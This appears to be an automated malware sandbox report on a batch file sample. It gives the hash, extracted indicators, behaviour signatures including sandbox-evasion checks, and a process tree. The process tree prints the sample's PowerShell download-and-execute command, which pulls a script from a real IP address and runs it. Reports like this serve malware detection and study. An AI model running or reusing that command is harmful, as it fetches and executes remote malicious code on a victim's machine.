Analysis

  • max time kernel
    132s
  • resource
    win10v191014
  • submitted
    16-12-2019 11:10

General

  • Target

    v8LCmD3G.bat

  • Sample

    191216-2j3v7dn8ej

  • SHA256

    89020b9c4772d552cedc03dabeb74aedbbd4dd6aff529044a0f671a74d47603b

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/v8LCmD3G

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Checks for installed software on the system 1 TTPs 63 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 3 IoCs
  • Windows security modification 2 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v8LCmD3G.bat"
    1⤵
      PID:4940
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/v8LCmD3G');Invoke-NLAQTFGPOOTF;Start-Sleep -s 10000"
        2⤵
          PID:4984
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 704
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            PID:4212
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k WerSvcGroup
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        PID:5084
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
        1⤵
          PID:1692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
          1⤵
            PID:1008
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
            1⤵
            • Drops file in System32 directory
            PID:4640
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4656
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s wisvc
            1⤵
              PID:4340
            • C:\Windows\system32\SppExtComObj.exe
              C:\Windows\system32\SppExtComObj.exe -Embedding
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:4316
              • C:\Windows\System32\SLUI.exe
                "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                2⤵
                  PID:4244
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                1⤵
                • Drops file in Windows directory
                PID:2700
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                1⤵
                  PID:4796
                • \??\c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
                  1⤵
                    PID:4888
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
                    1⤵
                      PID:3964
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k unistacksvcgroup
                      1⤵
                        PID:3588

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC13C.tmp.csv

                      • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1BA.tmp.txt

                      • memory/4212-23-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-10-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-9-0x0000000004BB0000-0x0000000004BB1000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-24-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-11-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-25-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-13-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-14-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-15-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-16-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-17-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-18-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-19-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-20-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-21-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-22-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-3-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-8-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-12-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-26-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-27-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-28-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-29-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-30-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-31-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-32-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-33-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-34-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-35-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-36-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-37-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-38-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-39-0x0000000000840000-0x0000000000841000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-0-0x0000000004730000-0x0000000004731000-memory.dmp

                        Filesize

                        4KB

                      • memory/4212-1-0x0000000004730000-0x0000000004731000-memory.dmp

                        Filesize

                        4KB